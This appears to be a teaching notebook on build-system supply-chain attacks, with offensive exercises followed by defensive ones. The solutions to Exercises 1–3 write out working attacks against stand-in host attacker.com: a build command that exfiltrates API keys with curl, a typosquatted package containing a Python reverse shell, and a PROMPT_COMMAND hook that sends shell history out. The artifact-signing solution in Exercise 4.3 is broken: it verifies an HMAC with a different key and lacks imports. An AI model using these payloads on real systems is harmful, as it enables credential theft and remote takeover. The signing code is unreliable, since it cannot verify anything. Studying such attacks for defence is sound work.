# Lab 2: Build System Compromise

In this exercise, you'll learn about supply chain attacks targeting build systems by implementing functions that demonstrate:
1. Build script injection attacks
2. Dependency tampering
3. Build environment poisoning

We'll use a simulated build system to safely demonstrate these concepts.

## Setup

First, let's set up our classes and helper functions:

In [None]:
from dataclasses import dataclass
from typing import List, Dict, Optional, Set
import hashlib
import json
import subprocess
import sys
from pathlib import Path

@dataclass
class BuildScript:
    """Represents a build script with commands to execute"""
    commands: List[str]
    dependencies: List[str]
    
@dataclass
class BuildEnvironment:
    """Represents a build worker's environment"""
    env_vars: Dict[str, str]
    installed_packages: Set[str]
    
@dataclass
class BuildArtifact:
    """Represents the output of a build"""
    content: bytes
    metadata: Dict[str, str]
    hash: str = None
    
    def __post_init__(self):
        if self.hash is None:
            self.hash = hashlib.sha256(self.content).hexdigest()

@dataclass
class BuildSystem:
    """Represents our build infrastructure"""
    scripts: Dict[str, BuildScript] = None
    environments: Dict[str, BuildEnvironment] = None
    artifacts: Dict[str, BuildArtifact] = None
    
    def __post_init__(self):
        if self.scripts is None:
            self.scripts = {}
        if self.environments is None:
            self.environments = {}
        if self.artifacts is None:
            self.artifacts = {}

# Create test build system
build_system = BuildSystem()
build_system.environments["worker-1"] = BuildEnvironment(
    env_vars={"PATH": "/usr/local/bin:/usr/bin", "PYTHONPATH": "/usr/local/lib"},
    installed_packages={"pip", "build-essential", "python3"}
)

### Exercise 1: Build Script Injection

Your first task is to implement a build script injection attack. The build system accepts scripts 
containing shell commands that are executed during build. Your goal is to create a malicious build
script that looks innocent but contains an injection that will exfiltrate sensitive data.

Tips:
- Build scripts often download dependencies and run tests
- Command injection can be hidden in seemingly innocent commands
- Build environments usually have access to sensitive data like API keys

In [None]:
def create_malicious_build_script(exfiltration_url: str) -> BuildScript:
    """
    Creates a build script that appears innocent but exfiltrates data
    
    Args:
        exfiltration_url: URL where stolen data should be sent
        
    Returns:
        BuildScript with hidden malicious commands
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
exfil_url = "https://attacker.com/collect"
script = create_malicious_build_script(exfil_url)

# Script should look innocent
assert any("pip install" in cmd for cmd in script.commands), "Script should include dependency installation"
assert any("test" in cmd.lower() for cmd in script.commands), "Script should include tests"

# But contain hidden malicious commands
script_text = " ".join(script.commands)
assert exfil_url in script_text, "Script should include exfiltration URL"
assert "curl" in script_text or "wget" in script_text, "Script should include exfiltration method"

print("Malicious build script created successfully!")

<details>
<summary>Solution</summary>

```python
def create_malicious_build_script(exfiltration_url: str) -> BuildScript:
    # Create innocent-looking commands
    commands = [
        "pip install -r requirements.txt",
        "python -m pytest tests/",
        # Hidden command that sends API keys to attacker
        f"curl {exfiltration_url} -d \"$(env | grep API)\" || true",
        "echo 'Build completed successfully'"
    ]
    
    return BuildScript(
        commands=commands,
        dependencies=["pytest", "requests"]
    )
```
</details>


### Exercise 2: Dependency Substitution Attack

Next, implement a dependency substitution attack. The build system downloads dependencies
from a package repository. Your goal is to create a malicious package that can be 
substituted for a legitimate one.

Tips:
- Package names are often similar to legitimate ones
- Build systems may fallback to alternative repositories
- Version numbers can be used to trigger installation

In [None]:
@dataclass
class Package:
    """Represents a software package"""
    name: str
    version: str
    content: bytes
    metadata: Dict[str, str]

def create_malicious_package(target_package: str) -> Package:
    """
    Creates a malicious package masquerading as a legitimate one
    
    Args:
        target_package: Name of legitimate package to impersonate
        
    Returns:
        Package with malicious code but legitimate-looking metadata
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
target = "requests"
malicious = create_malicious_package(target)

# Package should look legitimate
assert malicious.name.lower().startswith(target.lower()), "Name should be similar to target"
assert "author" in malicious.metadata, "Should have author metadata"
assert "description" in malicious.metadata, "Should have description"

# But contain malicious code
assert b"import socket" in malicious.content or b"import subprocess" in malicious.content
print("Malicious package created successfully!")

<details>
<summary>Solution</summary>

```python
def create_malicious_package(target_package: str) -> Package:
    # Create similar package name
    name = f"{target_package}-utils"
    
    # Legitimate-looking metadata
    metadata = {
        "name": name,
        "version": "1.0.0",
        "author": "Python Package Index",
        "description": f"Utilities for {target_package}",
        "url": f"https://pypi.org/project/{name}"
    }
    
    # Malicious code that creates reverse shell
    content = f"""
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker.com",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
""".encode()
    
    return Package(name, "1.0.0", content, metadata)
```
</details>

### Exercise 3: Build Environment Compromise

Finally, implement a build environment compromise attack. Build workers store credentials
and other sensitive data in environment variables and files. Your goal is to modify the
build environment to steal these secrets.

Tips:
- Build environments often contain API keys and tokens
- Environment variables can be modified or exported
- Sensitive files may be accessible to build scripts

In [None]:
def compromise_build_environment(env: BuildEnvironment) -> BuildEnvironment:
    """
    Modifies a build environment to exfiltrate secrets
    
    Args:
        env: The build environment to compromise
        
    Returns:
        Modified build environment that will exfiltrate secrets
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
clean_env = BuildEnvironment(
    env_vars={
        "PATH": "/usr/bin",
        "AWS_SECRET_KEY": "secret123",
        "GITHUB_TOKEN": "ghp_123"
    },
    installed_packages={"python3"}
)

compromised = compromise_build_environment(clean_env)

# Environment should still work
assert "PATH" in compromised.env_vars, "Should preserve PATH"
assert "python3" in compromised.installed_packages, "Should preserve basic packages"

# But include malicious modifications
assert any("WEBHOOK" in var or "EXFIL" in var for var in compromised.env_vars), "Should add exfiltration method"
assert compromised.env_vars != clean_env.env_vars, "Should modify environment"

print("Build environment compromised successfully!")

<details>
<summary>Solution</summary>

```python
def compromise_build_environment(env: BuildEnvironment) -> BuildEnvironment:
    # Create compromised environment
    new_env = BuildEnvironment(
        env_vars=env.env_vars.copy(),
        installed_packages=env.installed_packages.copy()
    )
    
    # Add exfiltration mechanisms
    new_env.env_vars.update({
        # Modify PATH to include malicious directory
        "PATH": "/tmp/malicious:" + new_env.env_vars["PATH"],
        # Add webhook for secret exfiltration
        "EXFIL_WEBHOOK": "https://attacker.com/collect",
        # Modify shells to log commands
        "PROMPT_COMMAND": "curl $EXFIL_WEBHOOK -d \"$(history)\""
    })
    
    # Install malicious packages
    new_env.installed_packages.add("malicious-logger")
    
    return new_env
```
</details>

### Exercise 4: Implementing Build Security Controls

Now that we've seen various build system attacks, let's implement some key security controls.
You'll implement script verification, environment isolation, and artifact signing.

### Exercise 4.1: Build Script Verification

Build script verification is a critical control to prevent injection attacks. A proper verification system should:
* Check commands against an allowlist of permitted executables
* Verify all dependencies come from trusted sources
* Look for dangerous patterns like command injection characters
* Validate any environment variable references

Your function should implement these checks and err on the side of rejection - it's better to block a legitimate script than allow a malicious one through.

In [None]:
def verify_build_script(script: BuildScript, allowed_commands: Set[str], allowed_deps: Set[str]) -> bool:
    """
    Verifies a build script against security policy
    
    Args:
        script: The build script to verify
        allowed_commands: Set of allowed command executables (e.g. {"pip", "python"})
        allowed_deps: Set of allowed dependencies (e.g. {"pytest", "requests"})
        
    Returns:
        True if script is safe, False if it contains disallowed commands/deps
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
# Test command allowlist
safe_script = BuildScript(
    commands=["pip install pytest", "python -m pytest tests/"],
    dependencies=["pytest"]
)
bad_command_script = BuildScript(
    commands=["curl evil.com", "pip install pytest"],
    dependencies=["pytest"] 
)
allowed_commands = {"pip", "python", "pytest"}
allowed_deps = {"pytest", "requests"}

assert verify_build_script(safe_script, allowed_commands, allowed_deps)
assert not verify_build_script(bad_command_script, allowed_commands, allowed_deps)

# Test command injection protection
injection_script = BuildScript(
    commands=["pip install pytest; curl evil.com", "python tests.py"],
    dependencies=["pytest"]
)
assert not verify_build_script(injection_script, allowed_commands, allowed_deps)

# Test dependency verification
bad_dep_script = BuildScript(
    commands=["pip install pytest"],
    dependencies=["malicious-package"]
)
assert not verify_build_script(bad_dep_script, allowed_commands, allowed_deps)

print("Build script verification tests passed!")

<details>
<summary>Solution</summary>

```python
def verify_build_script(script: BuildScript, allowed_commands: Set[str], allowed_deps: Set[str]) -> bool:
    # Verify dependencies
    if not all(dep in allowed_deps for dep in script.dependencies):
        return False
        
    # Check each command
    for cmd in script.commands:
        # Split command and get base executable
        parts = cmd.split()
        if not parts:
            continue
        base_cmd = parts[0]
        
        # Check against command allowlist
        if base_cmd not in allowed_commands:
            return False
            
        # Look for command injection characters
        if any(c in cmd for c in '|&;$()><`\\"\''):
            return False
            
        # Check for environment variable references
        if any(p.startswith("$") for p in parts[1:]):
            return False
            
        # Special checks for common commands
        if base_cmd == "pip":
            # Only allow installing from approved sources
            if "install" in parts and "--index-url" in parts:
                return False
                
    return True
```
</details>

### Exercise 4.2: Hermetic Build Environment

A hermetic build environment is one that is completely isolated and reproducible. This means:
* All inputs are explicitly declared - no accessing the network or host filesystem
* Build tools and dependencies are pinned to exact versions
* Environment variables are explicitly set, not inherited
* File system access is restricted to specific paths
* Each build gets a fresh environment

Implement a function that creates such an environment - this is similar to how container-based build systems work.

TODO: this is Sydney's least-favorite exercise. It's anemic. Sorry, I'm working on it.

In [None]:
@dataclass
class HermeticEnvironment(BuildEnvironment):
    """Extends BuildEnvironment with hermetic build controls"""
    allowed_paths: Set[str]
    input_files: Set[str]
    tool_versions: Dict[str, str]

def create_hermetic_environment(
    required_tools: Set[str],
    input_files: Set[str],
    build_path: str
) -> HermeticEnvironment:
    """
    Creates an isolated hermetic build environment
    
    Args:
        required_tools: Set of build tools needed (e.g. {"python", "gcc"})
        input_files: Set of input file paths that builds can access
        build_path: Path where build outputs should go
        
    Returns:
        HermeticEnvironment configured for secure builds
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
required_tools = {"python", "pip"}
input_files = {"/workspace/src/", "/workspace/requirements.txt"}
build_path = "/workspace/build"

env = create_hermetic_environment(required_tools, input_files, build_path)

# Should have minimal environment variables
assert "PATH" in env.env_vars
assert "PYTHONPATH" not in env.env_vars
assert all(not k.startswith("AWS_") for k in env.env_vars)

# Should have pinned tool versions 
assert all(t in env.tool_versions for t in required_tools)
assert all(v.count(".") >= 2 for v in env.tool_versions.values())  # Requires exact versions

# Should restrict file access
assert build_path in env.allowed_paths
assert not any(p == "/" for p in env.allowed_paths)
assert all(f in env.input_files for f in input_files)

print("Hermetic environment tests passed!")

<details>
<summary>Solution</summary>

```python
def create_hermetic_environment(
    required_tools: Set[str],
    input_files: Set[str],
    build_path: str
) -> HermeticEnvironment:
    # Pin exact versions for reproducibility
    tool_versions = {
        "python": "3.9.7",
        "pip": "21.2.4",
        "gcc": "9.3.0",
        "make": "4.2.1"
    }
    
    # Create minimal environment
    env_vars = {
        # Minimal PATH with only necessary dirs
        "PATH": "/opt/build/bin:/usr/local/bin",
        # Build-specific temp
        "TMPDIR": f"{build_path}/tmp",
        # No user config
        "HOME": "/opt/build/home",
        # Prevent network access
        "NO_PROXY": "*",
        # Force deterministic build
        "SOURCE_DATE_EPOCH": "0",
        "PYTHONHASHSEED": "0"
    }
    
    # Restrict file access
    allowed_paths = {
        build_path,
        "/opt/build/bin",
        "/opt/build/lib",
        "/opt/build/include"
    }
    
    return HermeticEnvironment(
        env_vars=env_vars,
        installed_packages=required_tools,
        allowed_paths=allowed_paths,
        input_files=input_files,
        tool_versions=tool_versions
    )
```
</details>

### Exercise 4.3: Artifact Signing & Verification

Build artifact signing ensures that artifacts haven't been tampered with between build and deployment.
A proper implementation should:
* Sign the artifact content and all metadata
* Use asymmetric cryptography (private key for signing, public for verification)
* Include build environment info in signed metadata
* Support key rotation and revocation

This is similar to how container signing works in systems like Docker Content Trust.

In [None]:
@dataclass
class SignedArtifact(BuildArtifact):
    """Extends BuildArtifact with signature"""
    signature: Optional[bytes] = None
    signing_key_id: Optional[str] = None
    signature_metadata: Optional[Dict[str, str]] = None

def sign_build_artifact(
    artifact: BuildArtifact,
    private_key: bytes,
    key_id: str,
    build_env: BuildEnvironment
) -> SignedArtifact:
    """
    Signs a build artifact with build environment info
    
    Args:
        artifact: The artifact to sign
        private_key: Private key for signing
        key_id: ID of the signing key (for rotation/revocation)
        build_env: The environment that produced this artifact
        
    Returns:
        SignedArtifact with valid signature and metadata
    """
    # YOUR CODE HERE
    pass


def verify_artifact_signature(
    artifact: SignedArtifact,
    public_key: bytes,
    trusted_key_ids: Set[str]
) -> bool:
    """
    Verifies artifact signature and metadata
    
    Args:
        artifact: SignedArtifact to verify
        public_key: Public key for verification
        trusted_key_ids: Set of trusted signing key IDs
        
    Returns:
        True if signature is valid and key is trusted
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
artifact = BuildArtifact(
    content=b"test artifact",
    metadata={"version": "1.0.0"}
)
build_env = BuildEnvironment(
    env_vars={"PATH": "/usr/bin"},
    installed_packages={"python3"}
)
private_key = b"test-private-key"
public_key = b"test-public-key"
key_id = "key-2022-01"

# Test signing
signed = sign_build_artifact(artifact, private_key, key_id, build_env)
assert signed.signature is not None
assert signed.signing_key_id == key_id
assert "build_env" in signed.signature_metadata

# Test verification
trusted_keys = {key_id}
assert verify_artifact_signature(signed, public_key, trusted_keys)

# Should reject untrusted keys
assert not verify_artifact_signature(signed, public_key, {"different-key"})

# Should reject modified artifacts
tampered = SignedArtifact(
    content=b"modified",
    metadata=signed.metadata,
    signature=signed.signature,
    signing_key_id=signed.signing_key_id,
    signature_metadata=signed.signature_metadata
)
assert not verify_artifact_signature(tampered, public_key, trusted_keys)

print("Artifact signing tests passed!")

<details>
<summary>Solution</summary>

```python
def sign_build_artifact(
    artifact: BuildArtifact,
    private_key: bytes,
    key_id: str,
    build_env: BuildEnvironment
) -> SignedArtifact:
    # Create signature metadata
    signature_metadata = {
        "timestamp": datetime.datetime.utcnow().isoformat(),
        "build_env": json.dumps({
            "env_vars": build_env.env_vars,
            "packages": list(build_env.installed_packages)
        }),
        "key_id": key_id
    }
    
    # Create message to sign
    message = b"".join([
        artifact.content,
        json.dumps(artifact.metadata).encode(),
        json.dumps(signature_metadata).encode()
    ])
    
    # Sign with HMAC (in practice, use proper asymmetric crypto)
    signature = hmac.new(private_key, message, hashlib.sha256).digest()
    
    return SignedArtifact(
        content=artifact.content,
        metadata=artifact.metadata,
        signature=signature,
        signing_key_id=key_id,
        signature_metadata=signature_metadata
    )

def verify_artifact_signature(
    artifact: SignedArtifact,
    public_key: bytes,
    trusted_key_ids: Set[str]
) -> bool:
    # Verify key is trusted
    if artifact.signing_key_id not in trusted_key_ids:
        return False
        
    # Recreate signed message
    message = b"".join([
        artifact.content,
        json.dumps(artifact.metadata).encode(),
        json.dumps(artifact.signature_metadata).encode()
    ])
    
    # Verify signature (in practice, use proper asymmetric crypto)
    expected_sig = hmac.new(public_key, message, hashlib.sha256).digest()
    return hmac.compare_digest(artifact.signature, expected_sig)
```
</details>
